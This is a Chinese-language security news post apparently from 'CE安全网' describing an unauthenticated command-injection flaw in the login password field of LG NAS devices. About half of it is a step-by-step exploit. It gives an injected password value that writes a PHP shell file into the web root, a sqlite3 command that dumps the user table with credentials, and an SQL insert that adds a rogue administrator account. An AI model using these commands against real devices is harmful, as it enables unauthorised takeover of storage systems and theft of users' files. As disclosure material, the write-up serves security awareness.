LG NAS（网络存储设备）远程代码攻击漏洞

CE安全网独家播报：

黑客可以远程利用未修复的指令注入漏洞来控制来自LG的网络附加存储（NAS）设备。

许多LG NAS机型受到无需身份验证即可被远程攻击利用。

漏洞详情：

登录页面中的密码参数受到命令注入的影响。攻击者可以用此参数来执行任意命令，包括添加新用户帐户和转储包含现有用户名和密码的数据库。

添加新的用户名和相关的密码允许攻击者以授权用户的身份登录到管理界面并访问存储在设备上的任何文件。

利用这个漏洞的攻击可以从本地网络和互联网上发起。该公司表示，很难确定有多少设备容易受到来自互联网的攻击，但它估计大约有5万台。

CE安全网随机测试了大部分LG NAS设备型号，LG在其所有NAS产品中使用两种类型的固件，其中一个受此漏洞影响。

目前该远程漏洞已经通知LG安全部门，但并未收到任何回复。

漏洞利用：

在登录界面我们使用Burpsuite登录抓包，要添加一个新用户，我们可以简单地使用以下命令编写一个名为www.cesafe.com.php的持久性shell：

;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/www.cesafe.com.php

将其作为密码输入会利用此漏洞。

然后，通过传递以下命令，我们可以“转储”用户：

echo “.dump user” | sqlite3 /etc/nas/db/share.db

转储意味着读取所有数据库数据。我们转储数据库，以便我们可以看到用户的用户名和密码。这也让我们添加我们自己的。

要将新用户添加到数据库中，我们需要生成有效的MD5。我们可以使用包含的MD5工具创建一个用户名“cesafe.com”和密码“www.cesafe.com”的散列。

sudo nas-common md5 www.cesafe.com

旦我们有了有效的密码和用户名，我们就可以用下面的方式将它添加到数据库中：

INSERT INTO"user"VALUES('test','md5_hash','Vuln Test','cesafe.com@localhost','');

完成此操作后，我们可以使用测试用户名和密码登录LG网络存储。

我们能够以授权用户身份访问系统，并且能够访问存储在LAS设备上的任何数据或分类文件。